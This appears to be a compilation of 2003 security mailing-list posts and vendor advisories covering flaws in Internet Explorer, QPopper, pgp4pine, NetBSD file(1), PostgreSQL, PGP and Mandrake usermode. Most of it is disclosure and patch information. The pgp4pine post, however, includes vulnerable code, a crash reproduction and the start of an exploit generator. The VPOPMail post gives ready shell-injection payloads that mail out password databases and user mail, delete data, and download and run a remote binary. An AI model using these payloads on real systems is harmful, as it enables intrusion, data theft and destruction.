Re: .MHT Buffer Overflow in Internet Explorer
From: jelmer [EMAIL PROTECTED] I believe from ie6 SP1 on IE doesn't open any mht files directly from the web anymore. from the local filesystem it still works though. That's the funny thing, IE6 SP1 still allows opening MHT files directly from the web in the Internet Zone, so this is remotely exploitable on websites. Since MHT files are opened automatically, just like certain other media files, you can also open an MHT file automatically through an email message in the Restricted Zone. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher
Re: [Summary of Responses] Bound by Tradition: A sampling of the security posture of the Internet's DNS servers
On Tue, Mar 11, 2003 at 08:30:17AM -0800, Mike Schiffman wrote: 12) It is a bit misleading to say djbdns has no security vulnerabilities. While it is true that the component programs that make up djbdns have not had a known vulnerability, the design of djbdns relies on external services (Bernstein recommends rsync over ssh, I believe) to replicate data from the primary to secondaries. By that logic a bug in vi is a bug in BIND, because you need an editor to maintain zone files. DJB may recommend rsync over ssh, but djbdns as distributed by DJB only offers that as one potential way to get data from one computer to another, you can use any means you see fit to do so.
Re: QPopper 4.0.x buffer overflow vulnerability
The first I heard of the problem was this morning. Was any notice sent to [EMAIL PROTECTED] or [EMAIL PROTECTED] in advance of the posting here? If so, please let me know the details so I can see what happened to the message. If not, I'd like to know why. A fixed Qpopper (version 4.0.5fc2) is available now at ftp://ftp.qualcomm.com/eudora/servers/unix/popper/beta/. I plan on releasing 4.0.5 final tomorrow unless I hear of any problems with 4.0.5fc2. -- Randall Gellens [EMAIL PROTECTED] Opinions are personal; facts are suspect; I speak for myself only
pgp4pine stack overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Following informations: I Background: pgp4pine is a mail encryption/decryption/signature/verification wrapper to gpg for pine, it is called from pine to parse mail body and get PGP information from the file. more information : http://pgp4pine.flatline.de/ II Problem description: When installed/configured within pine, pgp4pine parse any incoming mail before reading (in the default standard configuration) looking for PGP tokens informations to do his sender's signature verifications. To verify incoming mail it calls : menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile); and read each line according to this loop : [...] char readline[CONSOLE_IO_LINE_LENGTH]; (where defines.h:#define CONSOLE_IO_LINE_LENGTH 256) [...] do { fertig=0; while (!fertig) { if ((c=getc(fin))==EOF) { outFile=inFile; /* this usually is not executed, EOF breaks directly */ return; } else if ((readline[i++]=c) == '\n') { readline[i]='\0'; fertig=1; } } fertig=0; if (strncmp(-BEGIN PGP SIGNED,readline,20)==0) { /* got signed message */ fclose(fin); while (fileVerify(inFile,outFile) 0); /* =1: Repeat */ fertig=1; } else if (strncmp(-BEGIN PGP,readline,14)==0) { /* got another type of PGP message (encrypted, keys ...) */ fclose(fin); fileDecrypt(inFile,outFile); waitForReturn(); fertig=1; } else i=0; /* Got waste line, reset i */ } while (!fertig); [...] If a single line go over 256 chars directly to EOF, it will overwrite saved environnement on the stack and return, since there is no check on the index 'i' within the readline[] array, [...] } else if ((readline[i++]=c) == '\n') { [...] you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary saved registers before hiting one condition to return. [...] if ((c=getc(fin))==EOF) { outFile=inFile; /* this usually is not executed, EOF breaks directly */ return; } [...] then try: [EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ echo `perl -e 'print Ax500'` testmail [EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail [...] Segmentation fault (core dumped) [EMAIL PROTECTED] ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core [...] Core was generated by `./pgp4pine-vuln -d -i testmail'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) Here it is ;) III Impact Since pgp4pine process any incoming email, sending special crafted email can make sender execute arbitrary code on the recipient box when the mail is opened. IV Workaround/Solutions Deactivate pgp4pine and use another pgp wrapper for pine : http://pgpenvelope.sourceforge.net/ http://www.megaloman.com/~hany/software/pinepgp/stable.html or any other... author [EMAIL PROTECTED] has been contacted since 01/2003 no reply since :/ V Proof of concept Attached proof of concept code, for any informations read the source. Best Regards, - --- Eric AUGE. -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+b1fGL/U5psk9l1gRAr1RAJ4pnFriwS073R3fEcGp+1nMF4Q58gCfdLAK 3aY03iuZQPfonSiyaqa5/Co= =zirR -END PGP SIGNATURE- /* * mailex-gen.c -- PGP4Pine exploit mail generator - proof of concept * Copyright (C) 2003 - Eric AUGE * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 of * the License or (at your option) any later version. * * This program is distributed in the hope that it will be * useful, but WITHOUT ANY WARRANTY; without even the implied * warranty * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA * 02111-1307 * USA * * how poc code works : * $ cp /bin/sh /tmp/sh * $ ls -l /tmp/sh * -rwxr-x---1 rivalusers 680304 Mar 12 15:17 /tmp/sh * $ ./mailex-gen * eip (i use readline[] addr): 0xbfffdbd0 * now type: /path/to/pgp4pine-vuln -d -i ./mailme * $ /path/to/pgp4pine-vuln -d -i ./mailme * $ ls -l /tmp/sh * -rwsr-xr-x1 rivalusers 680304 Mar 12 15:17 /tmp/sh * * * Eric AUGE [EMAIL PROTECTED] * */ /* * NOTE: EIP is hardcoded regarding my own system and tests, * tune it for your needs ;) */ #include stdio.h
[sorcerer-spells] MAN-SORCERER2003-03-11
-- Michael Walton Asst-Manager Tech Support [EMAIL PROTECTED] (915)677-7900 Sorcerer Update Advisory Tap Into the Source Source Name:man-1.51 Advisory ID:SORCERER2003-03-06-1 Date: March 11th, 2003 Problem Description: Fixes a bug which results in arbitrary code execution. Update: Sources have been updated to the lates version. Updated Sources: man-1.51 Recomendation: augur synch augur update Contacts: Email: [EMAIL PROTECTED] Mail List: https://lists.berlios.de/mailman/listinfo/sorcerer-spells Web:http://sorcerer.wox.org Irc:irc://irc.freenode.net #sorcerer
Re: QPopper 4.0.x buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On pon 10. marca 2003 14:31, Florian Heinz wrote: http://nstx.dereference.de/snippets/qex.c Feedback is welcome. Enforcing TLS/SSL is a temprorary workaround against script-kiddies - exploit (out-of-the-box) will not be able to authenticate. (there is a user foobar, with passwd lalala on the system) $ ./qex rootbox foobar lalala Phase 1: Seeking buffer size Connecting to xxx.xxx.xxx.xxx... Logging in... Could not log in. Did you provide a valid username/password-combination? Exiting due to error... that's becouse: $ telnet 0 110 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. +OK ready user foobar - -ERR [AUTH] You must use TLS/SSL or stronger authentication such as APOP to connect to this server quit Not a fix, but who sends plaintext passwords anyway :) Unfortunately, I must assume, that at some point some friendly soul will equip qex with TLS/SSL. What is the vendor response on that? - -- grok GPG public key at http://www.keyserver.net -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+bzP3ANulANzEW40RArDsAJ43VBZhYJXdhWsyGXT59LfwbJkH8wCgs+FW 8g4LLzXZ/D71rkaVjDRBR0c= =CVSC -END PGP SIGNATURE-
NetBSD Security Advisory 2003-003 Buffer Overflow in file(1)
-BEGIN PGP SIGNED MESSAGE- NetBSD Security Advisory 2003-003 = Topic: Buffer Overflow in file(1) Version:NetBSD-current: source prior to February 27, 2003 NetBSD 1.6: affected NetBSD-1.5.3: affected NetBSD-1.5.2: affected NetBSD-1.5.1: affected NetBSD-1.5: affected Severity: Inducing a user to run file(1) could execute code as the user Fixed: NetBSD-current: February 26, 2003 NetBSD-1.6 branch: March 8, 2003 (1.6.1 includes the fix) NetBSD-1.5 branch: March 9, 2003 (1.5.4 includes the fix) Abstract If file(1) is run over a specially constructed ELF file, an exploitable stack overflow occurs and attackers can gain the privileges of the user running file(1). Technical Details = A buffer overflow has been found in the file(1) program. If a user were to run file(1) over a specially doctored ELF file, arbitrary code would be executed as a result. Thus, if an attacker can somehow induce a user to run file(1) over a file the attacker controls, the attacker may gain any system privileges the victim possesses. See iDEFENSE Security Advisory 03.04.03 http://www.idefense.com/advisory/03.04.03.txt Solutions and Workarounds = The following instructions describe how to upgrade your file(1) binaries by updating your source tree and rebuilding and installing a new version of file(1). * NetBSD-current: Systems running NetBSD-current dated from before 2003-02-27 should be upgraded to NetBSD-current dated 2003-02-27 or later. The following files need to be updated from the netbsd-current CVS branch (aka HEAD) to the respective revisions: src/usr.bin/file/readelf.c: 1.17 src/usr.bin/file/softmagic.c: 1.31 To update from CVS, re-build, and re-install file: # cd src # cvs update -d -A -P usr.bin/file # cd usr.bin/file # make cleandir dependall # make install * NetBSD 1.6: The binary distribution of NetBSD 1.6 is vulnerable. Systems running NetBSD 1.6 sources dated from before 2003-03-09 should be upgraded from NetBSD 1.6 sources dated 2003-03-09 or later. NetBSD 1.6.1 will include the fix. The following files need to be updated from the netbsd-1-6 CVS branch to the respective revisions: src/usr.bin/file/readelf.c: 1.13.2.1 src/usr.bin/file/softmagic.c: 1.26.2.1 To update from CVS, re-build, and re-install file: # cd src # cvs update -d -r netbsd-1-6 -P usr.bin/file # cd usr.bin/file # make cleandir dependall # make install * NetBSD 1.5, 1.5.1, 1.5.2, 1.5.3: The binary distribution of NetBSD 1.5.3 is vulnerable. Systems running NetBSD 1.5, 1.5.1, 1.5.2, or 1.5.3 sources dated from before 2003-03-10 should be upgraded from NetBSD 1.5.* sources dated 2003-03-10 or later. The following files need to be updated from the netbsd-1-5 CVS branch to the respective revisions: src/usr.bin/file/readelf.c: 1.6.4.3 src/usr.bin/file/softmagic.c: 1.18.4.2 To update from CVS, re-build, and re-install file: # cd src # cvs update -d -r netbsd-1-5 -P usr.bin/file # cd usr.bin/file # make cleandir dependall # make install Thanks To = Lubomir Sedlacik and Antti Kantee, for drawing our attention to the problem. Christos Zoulas, for aiding in the solution and with this advisory. Revision History 2003-03-12 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. Copyright 2003, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2003-003.txt,v 1.7 2003/03/12 03:51:31 david Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (NetBSD) Comment: For info see http://www.gnupg.org iQCVAwUBPm9Mmz5Ru2/4N2IFAQEi1gQAkTTyWWzv+w4E+A+K0cpiAtmqoDv9l7B6 WmIy/o9U5/uvvI1JpOK3/QKI/QKsXQ1OC2/yK63nTv3rwb+m5olywGkE7DY4ObQk 9SnBe+lsVQbjTEM/lBCMwy86h9xTmiP4xrtF8Mw/rGN0HLOwHUIxkvOn+zYWH1jd gS5Tn2BNd2c= =urmE -END PGP SIGNATURE-
VPOPMail Account Administration (squirrel mail) version 0.9.7
Plugin info: http://www.squirrelmail.org/plugin_view.php?id=103 Description: VPOPMail Account Administration The plugin lets the user do the tasks he would be able using qmailadmin change password let mails forward create away messages Notes (from the README): * IMPORTANT For the plugin to work correctly, the Web-Server needs to run as same user as vpopmail does (most common: user vpopmail) this is because the plugin needs write-permissions to the users Maildir to - create appropriate .qmail-files - create away - messages Comments (from myself): This (allowing anything to be excuted as the web user) of course is a huge security hole. This actually goes beyond that and says to run the web server as vpopmail! Amazing! These people are far too trusting of their users. Bad idea. What could be worse? How about making it even easier to exploit every vpopmail binary? How? Unclean input parsing! If the vpopmail user is the same as the webuser you get to have fun with: vaddaliasdomain vconvert vdominfo vpasswd vadddomain vdeldomain vipmap vpopbull vadduser vdelivermail vkillvqmaillocal valias vdeloldusers vmkpasswdvsetuserquota vchkpw vdeluser vmoduser vuserinfo Basically the exploits are unlimited (as you get full access rights to vpopmail): #change password password;~vpopmail/bin/vpasswd [EMAIL PROTECTED] password #mail password database password;cat ~vpopmail/domains/example.com/vpasswd|mail -s owned [EMAIL PROTECTED] #remove vpopmail password;rm -rf ~vpopmail/ #get listings of mail password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail [EMAIL PROTECTED] #read any users mail passwd;cat ~vpopmail/domains/example.com/user/Maildir/new//1027359339.48628.example.com\,S\=2432 | mail [EMAIL PROTECTED] #execute other arbatrary code on server passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f; Here is the offending code (line 45 in vpopmail.php): system($vpasswd $username $pwd); As we can see, this is very bad. Very bad security model (running your webserver as vpopmail) backed up by sloppy coding (passing user entered data into the shell unescaped) == bad bad bad. So you just pass anything I wrote above (or really anything at all that you desire) and you own the systems vpopmail config. Enter this data into the password changing field (make sure it matches up in both) in the squirrel mail vpopmail password section to exploit. But it's just a plugin to a webmail system, so no big deal ;-) -- error [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Re: QPopper 4.0.x buffer overflow vulnerability
On Tue, Mar 11, 2003 at 07:05:51PM -0800, Randall Gellens wrote: The first I heard of the problem was this morning. Was any notice sent to [EMAIL PROTECTED] or [EMAIL PROTECTED] in advance of the posting here? If so, please let me know the details so I can see what happened to the message. If not, I'd like to know why. The cause for this bug is already identified and the fix is really simple, I didn't see a reason to delay the post. It wasn't my intention to cause you trouble, if I did so, I'm sorry. I had bad experience informing vendors in the past, so I skipped that in this case. For example, some time ago I reported the (non-exploitable) bug in pop_msg.c, line 254f.: free(local_element.mdef_macro); /* From strdup */ return pop_msg(p, POP_SUCCESS, HERE, Macro \%s\ accepted, local_element.mdef_macro); and I didn't get a reply. Perhaps you want to fix this flaw too, in fc2. regards, Florian Heinz
@(#)Mordred Labs advisory - Remote DoS in PostgreSQL = 7.2.2
-BEGIN PGP SIGNED MESSAGE- //@(#) Mordred Labs advisory 0x0007 Release date: August 26, 2002 Name: Remote DoS condition in PostgreSQL Versions affected: = 7.2.2 Conditions: entry in a pg_hba.conf file that matches attacker's host. Risk: average Author: Sir Mordred (http://mslabs.iwebland.com) I. Description: PostgreSQL is an advanced object-relational database management system that supports an extended subset of the SQL standard, including transactions, foreign keys, subqueries, triggers, user-defined types and functions. Check http://www.postgresql.org for more information. Upon connecting to a database, postmaster will fork a new process. After that, a child process will call a src/backend/postmaster/postmaster.c:DoBackend() routine, which after processing a startup packet (see src/include/libpq/pqcomm.h), will invoke a src/backend/libpq/auth.c:ClientAuthentication() routine to perform client authentication. If there is an entry in pg_hba.conf file, that matches an attacker's host, an attacker could trigger invocation of src/backend/libpq/auth.c:recv_and_check_password0(), which fails to detect a DoS condition. II. Details: Consider this snip of code from src/backend/libpq/auth.c: [snip] static int recv_and_check_password0(Port *port) { int32 len; char *buf; if (pq_getint(len, 4) == EOF) return STATUS_EOF; len -= 4; buf = palloc(len); /* len is taken from a packet */ [snip] Note, that the size of palloced memory is taken from the user's input. III. How to reproduce: It's clear from the advisory how to reproduce this. IV. Solution Disable network access for untrusted users. -BEGIN PGP SIGNATURE- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wmAEARECACAFAj5vXM4ZHHNpci5tb3JkcmVkQGh1c2htYWlsLmNvbQAKCRAOkXvN4BZr fHUdAKCtv+xPETQZLluTxHWgfIIcbDprwwCgsOtI5Qjzf0P2EwCFtowTdD9HsC4= =9INs -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliatel=427
Potential PGP signature verification problem?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello, I have come across a possible problem in the way PGP handles signature verification. The problem lies in the fact that PGP will strip OLE objects inserted in an e-mail and verify the message signature based only on the text, not informing the user that objects were striped. A WordPad document can be inserted in the e-mail as an OLE object, having the same font style and size as the original message. An attacker would take a signed message and insert such word document anywhere in the message as an OLE object and when the recepient checks the signature - the wordpad document is stripped and the signature would be valid - The attack would only work if the recepient does not use the pgp verified message text viewer dialog box to read the message but uses it only to verify the validity of the signature. This was tested with pgp.com's PGP version 8.0, other versions may be vulnerable as well. I have experimented with older versions and they only worked in the hash field of the PGP header which is stripped before the message is verified and the same attack can be performed but text would only be added at the beginning of the message. Regards, Avri Schneider http://pgp.mit.edu 0x44F87D04 -BEGIN PGP SIGNATURE- Version: PGP 8.0 - not licensed for commercial use: www.pgp.com iQA/AwUBPm0AKGelhJFE+H0EEQIyxACg7HTH5UjaSGy5D3cobYx0h6io1lsAnRk1 cWnPtLBNw3G3XBkZuuUXPgIg =fWay -END PGP SIGNATURE-
MDKSA-2003:031 - Updated usermode packages remove insecure shutdown command
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: usermode Advisory ID:MDKSA-2003:031 Date: March 12th, 2003 Affected versions: 8.1, 8.2, 9.0, Corporate Server 2.1, Multi Network Firewall 8.2 Problem Description: The /usr/bin/shutdown command that comes with the usermode package can be executed by local users to shutdown all running processes and drop into a root shell. This command is not really needed to shutdown a system, so it has been removed and all users are encouraged to upgrade. Please note that the user must have local console access in order to obtain a root shell in this fashion. References: Updated Packages: Corporate Server 2.1: 6b3efb01bca77c598bfed862df7a10fe corporate/2.1/RPMS/usermode-1.55-8.1mdk.i586.rpm eda24e3cdb96a6171e5b6ed7e6b1da2b corporate/2.1/RPMS/usermode-consoleonly-1.55-8.1mdk.i586.rpm 498c7c44ab984017a38662202ec7e61f corporate/2.1/SRPMS/usermode-1.55-8.1mdk.src.rpm Mandrake Linux 8.1: d338123f2d65b6d5e37c3475cb658720 8.1/RPMS/usermode-1.42-8.1mdk.i586.rpm 1f56c7f08d8c1cd5f984e150c0c7ab98 8.1/SRPMS/usermode-1.42-8.1mdk.src.rpm Mandrake Linux 8.1/IA64: f5d33ef9c30d28a9a01fc6e277b5b703 ia64/8.1/RPMS/usermode-1.42-8.1mdk.ia64.rpm 1f56c7f08d8c1cd5f984e150c0c7ab98 ia64/8.1/SRPMS/usermode-1.42-8.1mdk.src.rpm Mandrake Linux 8.2: ab8e859ccce7f45022ba698742f70552 8.2/RPMS/usermode-1.44-4.1mdk.i586.rpm 18693e77214c918ce8aadc405c9347c3 8.2/RPMS/usermode-consoleonly-1.44-4.1mdk.i586.rpm c75d3d564384692e412fb24ad885193c 8.2/SRPMS/usermode-1.44-4.1mdk.src.rpm Mandrake Linux 8.2/PPC: 152e076d46e0eb5b37784005d0dfabcc ppc/8.2/RPMS/usermode-1.44-4.1mdk.ppc.rpm 228e12c9af55c32e814a9d712c10da53 ppc/8.2/RPMS/usermode-consoleonly-1.44-4.1mdk.ppc.rpm c75d3d564384692e412fb24ad885193c ppc/8.2/SRPMS/usermode-1.44-4.1mdk.src.rpm Mandrake Linux 9.0: 6b3efb01bca77c598bfed862df7a10fe 9.0/RPMS/usermode-1.55-8.1mdk.i586.rpm eda24e3cdb96a6171e5b6ed7e6b1da2b 9.0/RPMS/usermode-consoleonly-1.55-8.1mdk.i586.rpm 498c7c44ab984017a38662202ec7e61f 9.0/SRPMS/usermode-1.55-8.1mdk.src.rpm Multi Network Firewall 8.2: 18693e77214c918ce8aadc405c9347c3 mnf8.2/RPMS/usermode-consoleonly-1.44-4.1mdk.i586.rpm c75d3d564384692e412fb24ad885193c mnf8.2/SRPMS/usermode-1.44-4.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): 408 - vulnerability fixed in RedHat two years ago still in Mandrake 8.2 To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with rpm -Fvh *.rpm. A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig filename All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team security linux-mandrake.com - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg 2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD